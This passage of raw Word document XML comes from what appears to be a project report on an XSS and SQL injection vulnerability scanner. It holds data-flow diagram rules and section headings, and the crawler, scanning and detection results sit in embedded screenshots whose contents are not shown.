        <w:pStyle w:val="4"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="96" w:name="_Toc43339168"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Data flow</w:t>
      </w:r>
      <w:bookmarkEnd w:id="96"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>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Flow has only one direction of flow between symbols.  It may flow in both directions between a process and a data store to show a read before an update.  The latter is usually indicated however by two separate arrows since these happen at different type.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>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join in DFD means that exactly the same data comes from any of two or more different processes data store or sink to a common location.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>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flow cannot go directly back to the same process it leads.  There must be atleast one other process that handles the data flow produce some other data flow returns the original data into the beginning process.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>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flow to a data store means update (delete or change).</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="360"/>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Flow from a data store means retrieve or use.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="10"/>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r>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>A data flow has a noun phrase label more than one data flow noun phrase can appear on a single arrow as long as all of the flows on the same arrow move together as one package.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Crawler DFD :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:cs="Times New Roman"/>
          <w:b w:val="0"/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:u w:val="none"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5603240" cy="5276215"/>
            <wp:effectExtent l="0" t="0" r="5080" b="12065"/>
            <wp:docPr id="37" name="Picture 37" descr="Screenshot 2024-05-31 19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05-31 195915"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId12"/>
                    <a:srcRect l="11803" t="539" r="7632"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5603240" cy="5276215"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p/>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>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p>
    <w:p>
      <w:pPr>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:szCs w:val="22"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="97" w:name="_Toc43339174"/>
      <w:bookmarkStart w:id="98" w:name="_Toc8741"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t xml:space="preserve">Design </w:t>
      </w:r>
      <w:bookmarkEnd w:id="97"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w:lang w:val="en-IN"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:bookmarkEnd w:id="98"/>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>For Documentation (using -h):</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5718810" cy="3188970"/>
            <wp:effectExtent l="0" t="0" r="11430" b="11430"/>
            <wp:docPr id="38" name="Picture 38" descr="Screenshot 2024-05-31 21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5-31 210604"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId13"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5718810" cy="3188970"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Crawler :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5721350" cy="2950210"/>
            <wp:effectExtent l="0" t="0" r="8890" b="6350"/>
            <wp:docPr id="42" name="Picture 42" descr="Screenshot 2024-05-31 21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5-31 211720"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId14"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5721350" cy="2950210"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>For XSS Injection :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5727700" cy="1078865"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3175"/>
            <wp:docPr id="39" name="Picture 39" descr="Screenshot 2024-05-31 21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05-31 210940"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId15"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5727700" cy="1078865"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t xml:space="preserve">Driver </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Scanning XSS Vulnerabilities :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5724525" cy="2037080"/>
            <wp:effectExtent l="0" t="0" r="5715" b="5080"/>
            <wp:docPr id="41" name="Picture 41" descr="Screenshot 2024-05-31 2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5-31 211406"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId16"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724525" cy="2037080"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>XSS Vulnerabilities Detected :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5724525" cy="2087880"/>
            <wp:effectExtent l="0" t="0" r="5715" b="0"/>
            <wp:docPr id="43" name="Picture 43" descr="Screenshot 2024-05-31 21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5-31 211744"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId17"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5724525" cy="2087880"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>For SQL Injection :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5718175" cy="946150"/>
            <wp:effectExtent l="0" t="0" r="12065" b="13970"/>
            <wp:docPr id="40" name="Picture 40" descr="Screenshot 2024-05-31 21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05-31 211043"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId18"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5718175" cy="946150"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>SQL Vulnerabilities Detected :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5720080" cy="2004060"/>
            <wp:effectExtent l="0" t="0" r="10160" b="7620"/>
            <wp:docPr id="44" name="Picture 44" descr="Screenshot 2024-05-31 21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5-31 211827"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId19"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5720080" cy="2004060"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="700" w:hanging="700" w:hangingChars="250"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:t>Verifying Detected SQL Vulnerabilities :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="240" w:after="240" w:line="360" w:lineRule="auto"/>
        <w:ind w:left="700" w:hanging="700" w:hangingChars="250"/>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default" w:eastAsiaTheme="majorEastAsia"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="32"/>
          <w:lang w:val="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5725795" cy="3496945"/>
            <wp:effectExtent l="0" t="0" r="4445" b="8255"/>
            <wp:docPr id="45" name="Picture 45" descr="Screenshot 2024-05-31 21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5-31 212025"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId20"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5725795" cy="3496945"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:spacing w:after="240"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="36"/>
          <w:u w:val="single"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="99" w:name="_Toc43339194"/>
